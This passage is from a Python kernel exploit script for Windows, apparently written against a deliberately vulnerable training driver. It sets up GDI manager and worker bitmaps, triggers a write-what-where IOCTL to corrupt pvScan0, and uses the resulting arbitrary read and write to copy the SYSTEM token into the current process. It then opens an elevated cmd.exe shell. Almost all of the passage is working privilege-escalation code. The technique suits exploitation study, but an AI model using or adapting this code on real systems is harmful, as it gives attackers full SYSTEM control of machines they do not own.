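    debug_print("[>] Setting up Manager Bitmap:")
    debug_print("\t[+] Allocating and Freeing Windows")
    dup_address = alloc_free_windows()
    setup_manager_bitmap()
    hManager_pvscan0_offset = dup_address + 0x50
    debug_print("\t[+] Manager bitmap pvscan0 offset: 0x%X" % hManager_pvscan0_offset)

    # Massaging heap for Worker Bitmap
    debug_print("[>] Setting up Worker Bitmap:")
    debug_print("\t[+] Allocating and Freeing Windows")
    dup_address = alloc_free_windows()
    setup_worker_bitmap()
    hWorker_pvscan0_offset = dup_address + 0x50
    debug_print("\t[+] Worker bitmap pvscan0 offset: 0x%X" % hWorker_pvscan0_offset)

    # Using WWW to overwrite Manager pvscan0 value with address of Worker pvscan0
    write_where = hManager_pvscan0_offset
    # What is read through, so this object must outlive the IOCTL.
    write_what_ptr = c_void_p(hWorker_pvscan0_offset)
    evil_input = struct.pack("<Q", addressof(write_what_ptr)) + struct.pack("<Q", write_where)
    evil_size = len(evil_input)
    # ctypes buffer instead of ``id(evil_input) + 32`` (the character-data
    # offset of a CPython 2 str on x64 Windows): layout-independent address.
    evil_buf = create_string_buffer(evil_input, evil_size)
    evil_input_ptr = addressof(evil_buf)

    debug_print("\n[+] Triggering W-W-W to overwrite Manager pvscan0 value with Worker pvscan0 address")
    dwReturn = c_ulong()
    kernel32.DeviceIoControl(driver_handle, 0x22200B, evil_input_ptr, evil_size,
                             None, 0, byref(dwReturn), None)
    kernel32.CloseHandle(driver_handle)

    # Get SYSTEM EPROCESS
    system_EPROCESS = get_PsISP_kernel_address()
    debug_print("\n[+] SYSTEM EPROCESS: 0x%X" % system_EPROCESS)

    # Get current EPROCESS
    current_EPROCESS = get_current_eprocess(system_EPROCESS)
    debug_print("[+] current EPROCESS: 0x%X" % current_EPROCESS)

    system_token = c_ulonglong()
    debug_print("\r\n[+] Reading System TOKEN")
    read_virtual(system_EPROCESS + token_offset, byref(system_token), sizeof(system_token))

    debug_print("[+] Writing System TOKEN")
    write_virtual(current_EPROCESS + token_offset, byref(system_token), sizeof(system_token))

    if shell.IsUserAnAdmin():
        debug_print("[*] Enjoy Elevated Privs !\r\n")
        os.system('cmd.exe')
    else:
        debug_print("[-] Exploit did not work. Re-run it!")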